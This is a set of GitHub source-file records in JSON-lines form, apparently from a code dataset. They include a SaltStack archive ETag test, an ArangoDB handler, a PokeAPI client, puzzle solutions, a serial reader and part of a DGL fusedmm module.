directory=None):\n \"\"\"\n Function to serve a directory via http.server\n \"\"\"\n handler = functools.partial(TestRequestHandler, directory=directory)\n s = http.server.HTTPServer((\"127.0.0.1\", port), handler)\n s.serve_forever()\n\n\n@pytest.fixture(scope=\"module\")\ndef free_port():\n \"\"\"\n Utility fixture to grab a free port for the web server\n \"\"\"\n with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:\n s.bind((\"\", 0))\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n return s.getsockname()[1]\n\n\n@pytest.fixture(autouse=True, scope=\"module\")\ndef server(free_port, web_root):\n \"\"\"\n Web server fixture\n \"\"\"\n p = multiprocessing.Process(target=serve, args=(free_port, web_root))\n p.start()\n yield\n p.terminate()\n p.join()\n\n\n@pytest.fixture(scope=\"module\")\ndef web_root(tmp_path_factory):\n \"\"\"\n Temporary directory fixture for the web server root\n \"\"\"\n _web_root = tmp_path_factory.mktemp(\"web_root\")\n try:\n yield str(_web_root)\n finally:\n shutil.rmtree(str(_web_root), ignore_errors=True)\n\n\n@pytest.mark.slow_test\ndef test_archive_extracted_web_source_etag_operation(\n modules, states, free_port, web_root, minion_opts\n):\n \"\"\"\n This functional test checks the operation of the use_etag parameter to the\n archive.extracted state. There are four (4) invocations of archive.extracted\n with a web source, but only three (3) will trigger a call to the web server\n as shown below and in comments within.\n\n 127.0.0.1 - - [08/Mar/2022 13:07:10] \"GET /foo.tar.gz HTTP/1.1\" 200 -\n 127.0.0.1 - - [08/Mar/2022 13:07:10] \"GET /foo.tar.gz HTTP/1.1\" 304 -\n 127.0.0.1 - - [08/Mar/2022 13:07:10] \"GET /foo.tar.gz HTTP/1.1\" 200 -\n\n Checks are documented in the comments.\n \"\"\"\n # Create file in the web root directory to serve\n states.file.managed(\n name=os.path.join(web_root, \"foo\", \"bar.txt\"),\n contents=\"this is my file\",\n makedirs=True,\n )\n modules.archive.tar(\n options=\"czf\",\n tarfile=os.path.join(web_root, \"foo.tar.gz\"),\n sources=[os.path.join(web_root, \"foo\")],\n cwd=web_root,\n )\n\n # File should not be cached yet\n cached_file = os.path.join(\n minion_opts[\"cachedir\"],\n \"extrn_files\",\n \"base\",\n f\"localhost{free_port}\",\n \"foo.tar.gz\",\n )\n cached_etag = cached_file + \".etag\"\n assert not os.path.exists(cached_file)\n assert not os.path.exists(cached_etag)\n\n # Pull the file from the web server\n # Web server returns 200 status code with content:\n # 127.0.0.1 - - [08/Mar/2022 13:07:10] \"GET /foo.tar.gz HTTP/1.1\" 200 -\n states.archive.extracted(\n name=web_root,\n source=f\"http://localhost:{free_port}/foo.tar.gz\",\n archive_format=\"tar\",\n options=\"z\",\n use_etag=True,\n )\n\n # Now the file is cached\n assert os.path.exists(cached_file)\n assert os.path.exists(cached_etag)\n\n # Store the original modified time of the cached file\n cached_file_mtime = os.path.getmtime(cached_file)\n\n # Pull the file again. Etag hasn't changed. No download occurs.\n # Web server returns 304 status code and no content:\n # 127.0.0.1 - - [08/Mar/2022 13:07:10] \"GET /foo.tar.gz HTTP/1.1\" 304 -\n states.archive.extracted(\n name=web_root,\n source=f\"http://localhost:{free_port}/foo.tar.gz\",\n archive_format=\"tar\",\n options=\"z\",\n use_etag=True,\n )\n\n # Check that the modified time of the cached file hasn't changed\n assert cached_file_mtime == os.path.getmtime(cached_file)\n\n # Change file in the web root directory\n states.file.managed(\n name=os.path.join(web_root, \"foo\", \"bar.txt\"),\n contents=\"this is my changed file\",\n )\n modules.archive.tar(\n options=\"czf\",\n tarfile=os.path.join(web_root, \"foo.tar.gz\"),\n sources=[os.path.join(web_root, \"foo\")],\n cwd=web_root,\n )\n\n # Don't use Etag. Cached file is there, Salt won't try to download.\n # No call to the web server will be made.\n states.archive.extracted(\n name=web_root,\n source=f\"http://localhost:{free_port}/foo.tar.gz\",\n archive_format=\"tar\",\n options=\"z\",\n use_etag=False,\n )\n\n # Check that the modified time of the cached file hasn't changed\n assert cached_file_mtime == os.path.getmtime(cached_file)\n\n # Now use Etag again. Cached file changes\n # Web server returns 200 status code with content\n # 127.0.0.1 - - [08/Mar/2022 13:07:10] \"GET /foo.tar.gz HTTP/1.1\" 200 -\n states.archive.extracted(\n name=web_root,\n source=f\"http://localhost:{free_port}/foo.tar.gz\",\n archive_format=\"tar\",\n options=\"z\",\n use_etag=True,\n )\n\n # The modified time of the cached file now changes\n assert cached_file_mtime != os.path.getmtime(cached_file)\n","repo_name":"saltstack/salt","sub_path":"tests/pytests/functional/states/test_archive.py","file_name":"test_archive.py","file_ext":"py","file_size_in_byte":7327,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"22014351418","text":"from math import *\r\n\r\ndef conv(num, from_sys, to_sys):\r\n num = int(num, from_sys)\r\n if to_sys == 2:\r\n print(bin(num).replace(\"0b\", \"\"))\r\n elif to_sys == 8:\r\n print(oct(num).replace(\"0o\", \"\"))\r\n elif to_sys == 10:\r\n print(num)\r\n elif to_sys == 16:\r\n print(hex(num).replace(\"0x\", \"\"))\r\n return\r\n\r\ndef inp():\r\n ''' 2 - Binary\r\n 8 - Octal\r\n 10 - Decimal\r\n 16 - Hexadecimal'''\r\n num = input(\"Write a number you want to convert: \")\r\n\r\n print(\"\\nWhat number system would you like to convert from?\")\r\n print(inp.__doc__)\r\n from_sys = input()\r\n\r\n print(\"\\nWhat number system would you like to convert from?\")\r\n print(inp.__doc__)\r\n to_sys = input()\r\n conv(num, int(from_sys), int(to_sys))\r\n\r\ndef cont():\r\n inp()\r\n while True:\r\n if input(\"Would you like to continue? (y/n): \").lower() == \"y\":\r\n inp()\r\n else:\r\n return\r\n\r\ncont()","repo_name":"slipkova/python_first","sub_path":"01-basics/myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11908941330","text":"\nimport logging\nimport requests\nfrom pyArango.connection import Connection\nfrom polymanager.core.graph_handler import GraphHandler\nimport uuid\nimport json\nfrom tenacity import retry, wait_fixed, stop_after_attempt\n\nclass ArangoDBHandler(GraphHandler):\n\n @retry(wait=wait_fixed(10), stop=stop_after_attempt(18))\n def get_conn(self):\n return Connection(arangoURL=self.url,\n username=self.user, password=self.password, max_retries=10)\n \n def __init__(\n self,\n hostname=\"127.0.0.1\",\n port=\"8529\",\n user=\"root\",\n password=\"\"\n ):\n self._hostname = hostname\n self._port = port\n self.user = user\n self.password = password\n self.url = \"http://{}:{}\".format(self._hostname, self._port)\n self.conn = self.get_conn() \n self._log = logging.getLogger(__name__)\n\n def get_health(self):\n res = requests.get(self.url+\"/_db/_system/_admin/server/availability\", timeout=5)\n return json.loads(res.text)\n\n def create_indexes(self, collection, collection_opts):\n for index in collection_opts[\"indexes\"]:\n index_type = index[\"index_type\"]\n fields = index[\"fields\"]\n name = index[\"name\"]\n if index_type == \"persistent\":\n unique = index_type[\"unique\"] if \"unique\" in index_type else False\n sparse = index_type[\"sparse\"] if \"sparse\" in index_type else True\n deduplicate = index_type[\"deduplicate\"] if \"deduplicate\" in index_type else False\n collection.ensurePersistentIndex(fields, unique=unique, sparse=sparse, deduplicate=deduplicate, name=name)\n elif index_type == \"hash\":\n unique = index_type[\"unique\"] if \"unique\" in index_type else False\n sparse = index_type[\"sparse\"] if \"sparse\" in index_type else True\n deduplicate = index_type[\"deduplicate\"] if \"deduplicate\" in index_type else False\n collection.ensureHashIndex(fields, unique=unique, sparse=sparse, deduplicate=deduplicate, name=name)\n elif index_type == \"fulltext\":\n collection.ensureFulltextIndex(fields, name=name)\n\n def insert_schema(self, schema):\n db_name = schema.get_namespace()\n if not self.conn.hasDatabase(db_name):\n self.conn.createDatabase(db_name)\n self.db = self.conn[db_name]\n collection = None\n collection_opts = schema.get_global_collection_opts()\n if collection_opts:\n if collection_opts[\"edge_collection\"]:\n collection = self.db.createCollection(\"Edges\", name=schema.get_collection_name())\n else:\n collection = self.db.createCollection(name=schema.get_collection_name())\n else:\n collection = self.db.createCollection(name=schema.get_collection_name())\n \n if collection_opts:\n self.create_indexes(collection, collection_opts)\n\n def delete_schema(self, schema):\n db_name = schema.get_namespace()\n self.db = self.conn[db_name]\n collection = self.db[schema.get_collection_name()]\n collection.delete()\n\n \n def drop_all(self):\n for db in self.conn.databases.keys():\n if db == \"_system\":\n continue\n session = requests.Session()\n session.auth = (self.user, self.password)\n session.delete(self.url+\"/_api/database/\"+db)\n\n def add_nodes(self, namespace, collection_name, list_nodes, ref_node):\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n ids = []\n for node in list_nodes:\n doc = collection.createDocument()\n doc.set(node)\n key = str(uuid.uuid4())\n doc._key = key\n doc.save()\n arangodb_id = \"{}/{}\".format(collection_name, key)\n node = {\"_key\": key, \"_id\": arangodb_id}\n ids.append(node)\n return ids\n\n def add_node(self, namespace, collection_name, node, ref_node):\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n doc = collection.createDocument()\n doc.set(node)\n key = str(uuid.uuid4())\n doc._key = key\n doc.save()\n arangodb_id = \"{}/{}\".format(collection_name, key)\n node = {\"_key\": key, \"_id\": arangodb_id}\n return node\n\n def delete_node(self, namespace, collection_name, node_id):\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n doc = collection[node_id]\n doc.delete()\n\n def delete_nodes(self, namespace, collection_name, nodes_id):\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n for node_id in nodes_id:\n doc = collection[node_id]\n doc.delete()\n\n def get_predicate(self, namespace, collection_name, node_id, predicate):\n self.db = self.conn[namespace]\n res = self.db.AQLQuery(\"\"\"RETURN DOCUMENT(\"{}\", \"{}\")\"\"\".format(collection_name, node_id))\n doc = res.response[\"result\"][0]\n if doc:\n return doc[predicate]\n\n def update_node(self, namespace, collection_name, node_id, node):\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n doc = collection[node_id]\n doc.set(node)\n doc.save()\n\n #it is not used for arangodb\n def reset_relationships(self, relationships, node_id):\n pass\n\n def get_edges(self,namespace, collection_name, node_id):\n try :\n self.db = self.conn[namespace]\n query = '''\n FOR e IN `{}`\n FILTER e._from == '{}' || e._to == '{}'\n RETURN e\n '''.format(collection_name, node_id, node_id)\n query_result = self.db.AQLQuery(query, rawResults=True)\n return query_result.response[\"result\"]\n except Exception:\n return None\n\n def has_collection(self, namespace, collection):\n return self.conn[namespace].hasCollection(collection)\n\n def update_relationships(self, namespace, collection_name, relationships):\n try :\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n id_from = \"{}\".format(relationships[\"from\"])\n id_to = \"{}\".format(relationships[\"to\"])\n relationships.pop(\"from\")\n relationships.pop(\"to\")\n edge = collection.fetchFirstExample({\"_to\": id_to, \"_from\": id_from})\n if edge.result:\n id_ = edge.result[0][\"_key\"]\n doc = collection[id_]\n for key in relationships.keys():\n doc[key] = relationships[key]\n doc.save()\n return {\"_key\": doc._key, \"_id\": doc._id}\n _key = str(uuid.uuid4())\n arangodb_id = \"{}/{}\".format(collection_name, _key)\n doc = collection.createEdge()\n doc._key = _key\n doc.links(id_from, id_to)\n for key in relationships.keys():\n doc[key] = relationships[key]\n doc.save()\n return {\"_key\": _key, \"_id\": arangodb_id}\n except Exception as e:\n return None\n \n def delete_relationships(self, namespace, collection_name, edges_id):\n try :\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n for edge_id in edges_id:\n doc = collection[edge_id]\n doc.delete()\n return True\n except Exception as e:\n return False\n\n def truncate(self, namespace, collection_name):\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n collection.truncate()\n\n def query(self, namespace, query):\n self.db = self.conn[namespace]\n res = self.db.AQLQuery(query)\n return res.response\n\n def node_exists(self, namespace, collection_name, node_id):\n self.db = self.conn[namespace]\n res = self.db.AQLQuery(\"\"\"RETURN DOCUMENT(\"{}\", \"{}\")\"\"\".format(collection_name, node_id))\n return res.response","repo_name":"fenix01/polyglot-data-manager","sub_path":"src/polymanager/core/arangodb/arangodb_handler.py","file_name":"arangodb_handler.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2057163190","text":"priority = \"_abcdefghijklmnopqrstuvwxyz\"\n\ndef getFileAsList(filename):\n rList = []\n with open(filename, \"r\") as fileObj:\n for line in fileObj.readlines():\n rList.append(line.strip())\n return rList\n\ndef compareString(string1, string2):\n for char in string1:\n if char in string2:\n return True, char\n return False, \"\"\n\ndef compareString3(string1, string2, string3):\n for char in string1:\n if char in string2 and char in string3:\n return True, char\n return False, \"\"\n\ndef splitHalf(string):\n length = int(len(string)/2)\n return string[:length], string[length:]\n\ndef convertoPriority(char):\n return priority.find(char.lower()) + (26 if char.isupper() else 0)\n\n\nlistOfBackpacks = getFileAsList(\"3rd/data\")\n\nsumPoints = 0\nfor i in range(int(len(listOfBackpacks)/3)):\n backpackTrio = listOfBackpacks[i*3:i*3+3]\n sumPoints += convertoPriority(compareString3(backpackTrio[0], backpackTrio[1], backpackTrio[2])[1])\n\nprint(sumPoints)","repo_name":"ElonDusk26/ADVENT-OF-CODE","sub_path":"3rd/3rd_pt2.py","file_name":"3rd_pt2.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32127215150","text":"\"\"\"Classes which permit make the request to Pokemon API enpoints.\"\"\"\nfrom typing import Any\n\nimport requests\nfrom requests.exceptions import JSONDecodeError\n\nfrom pokemon import Pokemon\n\nclass RequestApi():\n \"\"\"Model the general data and functionality to make a request.\n \n Attributes\n ----------\n base_url: str\n The base URL of the API.\n \n Notes\n -----\n At the moment is just defined the GET methos, but is possible\n define any other.\n \"\"\"\n\n def __init__(self, base_url: str) -> None:\n \"\"\"Initialize the attributes.\n \n Parameters\n ----------\n base_url: str\n The base URL of the API. \n\n Notes\n -----\n The base_url must to be finished in '/'.\n \"\"\"\n self.base_url: str = base_url\n\n def get(self, endpoint_url: str, **kwargs: int) -> requests.Response:\n \"\"\"Get data from and specific endpoint.\"\"\"\n return requests.get(f'{self.base_url}{endpoint_url}', **kwargs)\n\n\nclass PokeApi(RequestApi):\n \"\"\"Request to the PokeApi and process the data.\n\n Attributes\n ----------\n base_url: str\n The base URL of the API. In this case by default is the PokeAPI\n url. \n limit: int\n Indicate the number of resources to get by page. It is a query\n parameter.\n\n Notes\n ----- \n The PokeAPI only accept GET request, so it isn' necessary write\n any other. Besides is a public API, so doesn't need authentication.\n \"\"\"\n\n def __init__(self, base_url: str= 'https://pokeapi.co/api/v2/', **kwargs: int) -> None:\n \"\"\"Initialize the attributes.\n \n Parameters\n ----------\n base_url: str, optional\n The base URL of the PokeAPI.\n kwargs: dict\n Other parameters to create a request.\n\n Notes\n -----\n The base_url must to be finished in '/'.\n \"\"\"\n super().__init__(base_url)\n self.limit: int = kwargs.get('limit', 10) # By default is 10\n \n def get_all_pokemon(self) -> list[dict[str, str]]|None:\n \"\"\"Obtain -in only one request- the 'list' of all pokemon.\n\n Returns\n -------\n list[dict[str, str]]\n Contain the name of every pokemon registered.\n \"\"\"\n endpoint_url: str = 'pokemon/'\n params: dict[str, int] = {'limit': self.limit}\n\n response = self.get(endpoint_url, params=params) # type: ignore\n if response.status_code == 200:\n json_response: dict[str, Any] = self.json_response(response, 'get_all_pokemon')\n return json_response['results']\n\n print(f\"Una disculpa. Ha ocurrido un error al intentar obtener la lista de todos los pokémons.\")\n\n def json_response(self, response: requests.Response, method_name: str) -> dict[str, Any]:\n \"\"\"Try to convert the response to a JSON. In case it wasn't\n \n possible, set a message to re-raise the exception\n JSONDecodeError according the method where it is called.\n \n Paramaters\n ----------\n response: requests.Response\n Request response to PokeAPI. Object that can raise\n JSONDecodeError when is trying to deserialize it.\n method_name: str\n Name of method where the exception is raised.\n\n Returns\n -------\n dict[str, Any]\n The content of the response transformed in a JSON.\n\n Raises\n ------\n JSONDecodeError\n If the response contains invalid JSON.\n \"\"\"\n try:\n return response.json()\n except JSONDecodeError: \n raise JSONDecodeError(f\"There was a problem deserializing the request response in '{method_name}'.\")\n \n\n def get_pokemon(self, id: int = 0, name: str = '') -> Pokemon|None:\n \"\"\"Get the data of a pokemon data according its either id\n \n or name.\n \n Parameters\n ----------\n id: int, optional\n Pokemon's ID which is looking for.\n name: str, optional\n Pokemon's name which is looking for.\n\n Returns\n -------\n pokemon: Pokemon\n The instance of a pokemon with id, name, weight, height and\n egg_groups.\n \"\"\"\n endpoint_url: str ='pokemon-species/'\n weight: float = 0\n height: float = 0\n\n if not id and not name:\n raise AttributeError(f\"A parameter 'id' or 'name' is required.\")\n elif id and name:\n raise AttributeError(f\"It was provided both parameters 'id' and a 'name'. Please just input one of them.\")\n \n response: requests.Response = self.get(f'{endpoint_url}{id}/') if id else self.get(f'{endpoint_url}{name}/')\n if response.status_code == 200:\n json_response: dict[str, Any] = self.json_response(response, 'get_pokemon')\n egg_groups: list[dict[str,str]] = json_response['egg_groups']\n weight, height = self.get_weight_height_pokemon(id=id) if id else self.get_weight_height_pokemon(name=name)\n\n return Pokemon(\n id=json_response['id'],\n name=json_response['name'],\n weight=weight,\n height=height,\n egg_groups=egg_groups)\n \n elif id:\n print(f\"Una disculpa. Ha ocurrido un error al intentar obtener el pokémon con id: {id}.\")\n else:\n print(f\"Una disculpa. Ha ocurrido un error al intentar obtener el pokémon con el nombre: {name}.\")\n\n\n def get_weight_height_pokemon(self, id: int = 0, name: str = '') -> tuple[float, float]:\n \"\"\"Get the wight and height of the pokemon through its id\n\n or name.\n \n Parameters\n ----------\n id: int, optional\n Pokemon's ID which is looking for.\n name: str, optional\n Pokemon's name which is looking for.\n\n Returns\n -------\n tuple[float, float]\n A tuple with both values: (weight, height) \n\n Notes\n -----\n The values return are converted from hectograms to kilograms\n (weight) and from hectimeters to meters (height).\n \"\"\"\n endpoint_url: str = 'pokemon/'\n if not id and not name:\n raise AttributeError(f\"A parameter 'id' or 'name' is required.\")\n elif id and name:\n raise AttributeError(f\"It was provided both parameters 'id' and a 'name'. Please just input one of them.\")\n\n response: requests.Response = self.get(f'{endpoint_url}{id}/') if id else self.get(f'{endpoint_url}{name}/')\n if response.status_code == 200:\n json_response: dict[str, Any] = self.json_response(response, 'get_weight_height_pokemon')\n weight: float = json_response['weight'] * 0.1 # type: ignore\n height: float = json_response['height'] * 0.1 # type: ignore\n return weight, height\n\n\n def get_spanish_name(self, list_languages_names: list[dict[str, Any]]) -> str|None:\n \"\"\"Search within a list of dicts for that dict which refers to\n \n spanish language and get the interest data.\n\n Parameters\n ----------\n list_languages_names: list[dict[str, Any]]\n List of dicts that contains the data in distinct languages.\n\n Returns\n -------\n str\n The name in spanish, in case exists.\n \"\"\"\n for group_name in list_languages_names:\n if group_name['language']['name'] == 'es':\n return group_name['name']\n\n def set_values_dict(self, json_response: dict[str, Any],\n concept_value: str|int, key_word: str) -> tuple[str|int, list[dict[str, Any]]]:\n \"\"\"Set name of of the concept being treated and a list of \n \n dictionaries with the values of interest (key). Both values\n are returned.\n\n Parameters\n ----------\n json_response: dict[str, Any]\n The content of a response transformed to JSON.\n concept_value: str|int\n In case it won't be possible get the name in spanish, the\n concept value will work as name.\n key_word: str\n Indicate the key to search inside the json response.\n\n Responses\n ---------\n tuple[str|int, list[dict[str, Any]]]\n Name of the concept and the list of dictionaries with\n the values searched.\n\n Notes\n -----\n The most of the time the 'key' is about pokemon, that's the\n reason the variable named as 'pokemon_something'.\n \"\"\"\n concept_languages_names: list[dict[str, Any]] = json_response['names']\n concept_name: str|int = self.get_spanish_name(concept_languages_names) or concept_value\n return (concept_name, json_response[key_word])\n\n def get_egg_group_species(self, pokemon: Pokemon)-> dict[str, list]|None:\n \"\"\"Get the species that belongs to the same egg group.\n \n The species in the group are able to group with the pokemon.\n\n Parameters\n -----------\n pokemon: Pokemon\n The instance of a pokemon with id, name and egg_groups.\n\n Returns\n -------\n egg_group_species: dict[str, list]\n A dictionary where the keys are the egg groups' names and\n the values are lists which contain the species belonging to\n the egg group.\n \"\"\"\n endpoint_url: str = 'egg-group/'\n egg_group_species: dict[str, list] = {}\n egg_groups: list[dict[str, str]] = pokemon.egg_groups\n\n for egg_group in egg_groups:\n name = egg_group['name']\n response: requests.Response = self.get(f'{endpoint_url}{name}/')\n if response.status_code == 200:\n json_response: dict[str, Any] = self.json_response(response, 'get_egg_group_species')\n egg_group_name, species_list = self.set_values_dict(json_response, name, 'pokemon_species') \n # Add data to egg_group_species\n egg_group_species.setdefault(str(egg_group_name), species_list)\n else:\n print(f\"Una disculpa. Ha ocurrido un error al intentar obtener el grupo de huevo '{name}'.\")\n return None\n\n return egg_group_species\n\n def list_pokemon_by_type(self, type: str = '') -> dict[str, list]|None:\n \"\"\"Retrieve in a list the name of all pokemons belonging to\n \n the type.\n\n Parameters\n ----------\n type: str, optional\n Name of type to search its pokemons.\n\n Returns\n --------\n pokemons_of_type: dict[str, list]\n The key is the name of type -whether possible in spanish-\n and the value is a list with the name of all pokemons of\n the type.\n \"\"\"\n endpoint_url: str = 'type/'\n pokemons_of_type: dict[str, list] = {}\n if not type:\n raise AttributeError(f\"The 'type' parameter is required.\")\n \n response = self.get(f'{endpoint_url}{type}/')\n if response.status_code == 200:\n json_response: dict[str, Any] = self.json_response(response, 'list_pokemon_by_type')\n type_name, pokemon_dd_list = self.set_values_dict(json_response, type, 'pokemon') # dd is refers to dict_dict \n pokemon_dict_list: list[dict[str, str]] = [pokemon['pokemon'] for pokemon in pokemon_dd_list]\n \n # Add the data to the dict\n pokemons_of_type.setdefault(str(type_name), pokemon_dict_list)\n return pokemons_of_type\n\n print(f\"Una disculpa. Ha ocurrido un error al generar la lista de los pokémons de tipo '{type}'.\")\n\n def list_pokemon_generation(self, generation_number: int = 1) -> dict[str, list]|None:\n \"\"\"Generate a list with the names of each pokemon of that\n \n specific generation.\n\n Parameters\n ----------\n generation_number: int, optional\n Number generation. It can be greater than 8.\n\n Returns\n --------\n pokemons_of_generation: dict[str, list]\n The key is the name of generation, in spanish if possible,\n and the value is the list with the names.\n \"\"\"\n endpoint_url: str = 'generation/'\n pokemons_of_generation: dict[str, list] = {}\n\n if generation_number < 1 and generation_number > 8:\n print(f\"El número de la generación solo puede estar entre 1 y 8. El '{generation_number}' no es valido.\")\n return None\n response = self.get(f'{endpoint_url}{generation_number}/')\n \n if response.status_code == 200:\n json_response: dict[str, Any] = self.json_response(response, 'list_pokemon_generation')\n generation_name, pokemon_list = self.set_values_dict(json_response, generation_number, 'pokemon_species')\n pokemons_of_generation.setdefault(str(generation_name), pokemon_list)\n return pokemons_of_generation\n \n print(\n f\"Una disculpa. Ha ocurrido un error al generar la lista de los pokémons de la \"\n \"generación '{generation_number}'.\")\n\n","repo_name":"Jony-softdeveloper/Questions_PokeAPI","sub_path":"src/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":13252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40067858432","text":"# https://www.acmicpc.net/problem/4963 문제 제목 : 섬의 개수 , 언어 : Python, 날짜 : 2020-03-30, 결과 : 성공 \n\"\"\"\n 회고:\n 그냥 새로운 섬 만날떄마다 체크해주면 된다.\n 이제는 골드문제 아닌것들도 풀어봐야겠다. 골드문제 너무 어렵다..ㅠㅠ\n\"\"\"\n\nimport sys\nfrom collections import deque\n\ndef bfs(x,y,w,h):\n list_queue = deque()\n list_queue.append([x,y])\n while list_queue:\n now_x, now_y = list_queue.popleft()\n for i in range(8):\n nx = now_x + dx[i]\n ny = now_y + dy[i]\n if 0 <= nx < w and 0 <= ny < h:\n if list_map[ny][nx] == 1 and not list_visit[ny][nx]:\n list_visit[ny][nx] = 1\n list_queue.append([nx,ny])\n\n\ndx = [1,1,1,0,-1,-1,-1,0]\ndy = [1,0,-1,-1,-1,0,1,1]\nwhile True:\n w, h = map(int, sys.stdin.readline().split())\n if w == 0 and h == 0:\n break\n list_map = [list(map(int, sys.stdin.readline().split())) for _ in range(h)]\n list_visit = [[0]*w for _ in range(h)]\n count = 0\n for y in range(h):\n for x in range(w):\n if list_map[y][x] == 1 and not list_visit[y][x]:\n count+=1\n bfs(x,y,w,h)\n print(count)\n","repo_name":"SpicyKong/problems","sub_path":"BOJ/Q_4963.py","file_name":"Q_4963.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"20544134332","text":"import serial\nfrom PIL import Image\n#import IO\nbaud = 57600\nbytesize = serial.EIGHTBITS\nstopbits = serial.STOPBITS_ONE\nparitybits = serial.PARITY_NONE\nport = \"COM3\"\n\nbytelist = []\n\n\nser = serial.Serial(port = port, baudrate = baud, bytesize = bytesize, stopbits = stopbits, parity = paritybits)\ndone = False\ni = 0\nwhile(done==False):\n \n bytelist[i] = ser.read(32)\n print(bytelist[i])\n \n\nser.close()\n\n","repo_name":"AaravMohanty/SUAS","sub_path":"recieveImage.py","file_name":"recieveImage.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"14863629109","text":"\"\"\"dgl fusedmm operator module.\"\"\"\nimport sys\nfrom itertools import product\nfrom ..backend import gfusedmm as gfusedmm_internal\nfrom .. import backend as F\n\n__all__ = ['gfusedmm', 'fused_cpy_u', 'u_fmul_e_sum']\n\n# this operations are borrowed from spmm's\ndef reshape_lhs_rhs(lhs_data, rhs_data):\n r\"\"\" Expand dims so that there will be no broadcasting issues with different\n number of dimensions. For example, given two shapes (N, 3, 1), (E, 5, 3, 4)\n that are valid broadcastable shapes, change them to (N, 1, 3, 1) and\n (E, 5, 3, 4)\n Parameters\n ----------\n lhs_data : tensor or None\n The left operand, could be None if it's not required by op.\n rhs_data : tensor or None\n The right operand, could be None if it's not required by op.\n \"\"\"\n lhs_shape = F.shape(lhs_data)\n rhs_shape = F.shape(rhs_data)\n if len(lhs_shape) != len(rhs_shape):\n max_ndims = max(len(lhs_shape), len(rhs_shape))\n lhs_pad_ndims = max_ndims - len(lhs_shape)\n rhs_pad_ndims = max_ndims - len(rhs_shape)\n new_lhs_shape = (lhs_shape[0],) + (1,) * lhs_pad_ndims + lhs_shape[1:]\n new_rhs_shape = (rhs_shape[0],) + (1,) * rhs_pad_ndims + rhs_shape[1:]\n lhs_data = F.reshape(lhs_data, new_lhs_shape)\n rhs_data = F.reshape(rhs_data, new_rhs_shape)\n return lhs_data, rhs_data\n\n\ndef gfusedmm(g, op, reduce_op, lhs_data, rhs_data):\n r\"\"\" Generalized FUSEDMM.\n It computes edge features by :attr:`op` lhs features and rhs features.\n \n Parameters\n ----------\n g : DGLGraph\n The input graph.\n op : str\n The binary op's name, could be ``add``, ``sub``, ``mul``, ``div``,\n ``copy_lhs``, ``copy_rhs``.\n reduce_op : str\n Reduce operator, could be ``sum``, ``max``, ``min``, ``mean``.\n lhs_data : tensor or None\n The left operand, could be None if it's not required by the op.\n rhs_data : tensor or None\n The right operand, could be None if it's not required by the op.\n\n Returns\n -------\n tensor\n \n\tThe result tensor.\n \"\"\"\n if g._graph.number_of_etypes() == 1:\n if op not in ['fused_cpy_lhs', 'fused_cpy_rhs']:\n lhs_data, rhs_data = reshape_lhs_rhs(lhs_data, rhs_data)\n return gfusedmm_internal(\n g._graph, op, 'sum' if reduce_op == 'mean' else reduce_op, lhs_data, rhs_data)\n else:\n print(\"Hetero-graph not supported!\")\n return None\n\ndef _gen_copy_reduce_func(binary_op, reduce_op):\n\n name = \"{}_{}\".format(binary_op, reduce_op)\n binary_str = {\n \"fused_cpy_u\": \"It copies node feature to edge as the message.\",\n 'fused_cpy_e': \"It regards edge feature as message.\"\n }\n x_str = {\n \"fused_cpy_u\": \"source node\",\n \"fused_cpy_e\": \"edge\"\n }\n def func(g, x):\n if binary_op == 'fused_cpy_u':\n return gfusedmm(g, 'fused_cpy_lhs', reduce_op, x, None)\n elif binary_op == 'u_fmul_e_sum':\n return gfusedmm(g, 'u_fmul_e_sum', reduce_op, x, None)\n else:\n return gfusedmm(g, 'fused_cpy_rhs', reduce_op, None, x)\n\n func.__name__ = name\n #print(\"python/dgl/ops/spmm...\", name)\n #func.__doc__ = docstring(binary_op)\n return func\n\ndef fused_cpy_u(g, x):\n r\"\"\"Generalized FusedMM function that copies source node features to edges.\n\n Parameters\n ----------\n g : DGLHeteroGraph\n The input graph.\n x : tensor\n The source node features.\n\n Returns\n -------\n tensor\n The result tensor.\n\n Notes\n -----\n This function supports autograd (computing input gradients given the output gradient).\n \"\"\"\n return gfusedmm(g, 'fused_cpy_lhs', None, x, None)\n\ndef u_fmul_e_sum(g, x):\n r\"\"\"Generalized FusedMM function that copies source node features to edges.\n\n Parameters\n ----------\n g : DGLHeteroGraph\n The input graph.\n x : tensor\n The source node features.\n\n Returns\n -------\n tensor\n The result tensor.\n\n Notes\n -----\n This function supports autograd (computing input gradients given the output gradient).\n \"\"\"\n return gfusedmm(g, 'u_fmul_e_sum', None, x, None)\n\n\ndef _gen_fusedmm_func(binary_op, reduce_op):\n name = \"u_{}_e_{}\".format(binary_op, reduce_op)\n docstring = r\"\"\"Generalized FUSEDMM function.\n It computes edge features by {} features and {} features.\n Parameters\n ----------\n g : DGLHeteroGraph\n The input graph\n x : tensor\n The lhs features.\n y : tensor\n The rhs features.\n Returns\n -------\n tensor\n The result tensor.\n Notes\n -----\n This function supports autograd (computing input gradients given the output gradient). If the\n feature shape of two input operands do not match, we first broadcasts the features to a unified\n shape (note that the memory usage will not increase accordingly) and then performs the operation.\n Broadcasting follows 